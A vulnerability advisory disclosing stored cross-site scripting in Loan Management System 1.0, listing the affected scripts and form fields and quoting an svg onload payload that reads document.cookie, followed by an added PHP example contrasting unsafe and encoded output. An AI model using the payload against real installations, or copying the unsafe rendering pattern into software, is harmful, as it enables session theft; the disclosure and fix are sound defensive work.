Loan Management System 1.0 Cross Site Scripting

Loan Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

SHA-256 | 44b807c10851b4db74cc02ac40db2bbe66fd7376b59011a5c95ab7a8d9bd232b

# Exploit Title: Loan Management System - Stored XSS on several parameters
# Date: 28/07/2022
# Exploit Author: saitamang
# Vendor Homepage: sourcecodester
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip
# Version: 1.0
# Tested on: Centos 7 apache2 + MySQL

Several functions and parameters are affected, as listed below:

addUser.php
- firstname
- lastname

save_ltype.php
- ltype_name
- ltype_desc

save_borrower.php
- firstname
- middlename
- lastname
- address

The payload used for injection is "/><svg/onload=alert(document.cookie)>
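The fix for a stored XSS of this kind is output encoding wherever the saved fields are rendered. The following is an added example, not code from the Loan Management System or from the advisory author: the function names and the form markup are hypothetical, and only the field names and the payload string come from the advisory.

```php
<?php
// Added example: hypothetical rendering code, not taken from the LMS source.

// The advisory's payload reads document.cookie. An HttpOnly session cookie
// stays out of script reach even if one output path is left unencoded.
// Must run before session_start() and before any output is sent.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);

// Encode a stored value for an HTML text node or a quoted attribute value.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Unsafe pattern: stored values are concatenated straight into value="...".
function render_borrower_unsafe(array $row): string
{
    $html = '';
    foreach ($row as $field => $stored) {
        $html .= '<input name="' . $field . '" value="' . $stored . '"/>' . PHP_EOL;
    }
    return $html;
}

// Hardened pattern: every stored value is encoded at the point of output.
function render_borrower_safe(array $row): string
{
    $html = '';
    foreach ($row as $field => $stored) {
        $html .= '<input name="' . e($field) . '" value="' . e($stored) . '"/>' . PHP_EOL;
    }
    return $html;
}

// Constructed sample row using the save_borrower.php field names from the
// advisory; firstname holds the payload string quoted in the advisory.
$row = [
    'firstname'  => '"/><svg/onload=alert(document.cookie)>',
    'middlename' => 'A.',
    'lastname'   => 'Example',
    'address'    => '1 Sample Street',
];

echo "unsafe:\n", render_borrower_unsafe($row);
echo "safe:\n", render_borrower_safe($row);
```

In the unsafe output the leading quote and "/>" close the attribute and the tag, so the svg element becomes live markup; in the safe output the same characters appear as entities inside the value attribute.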
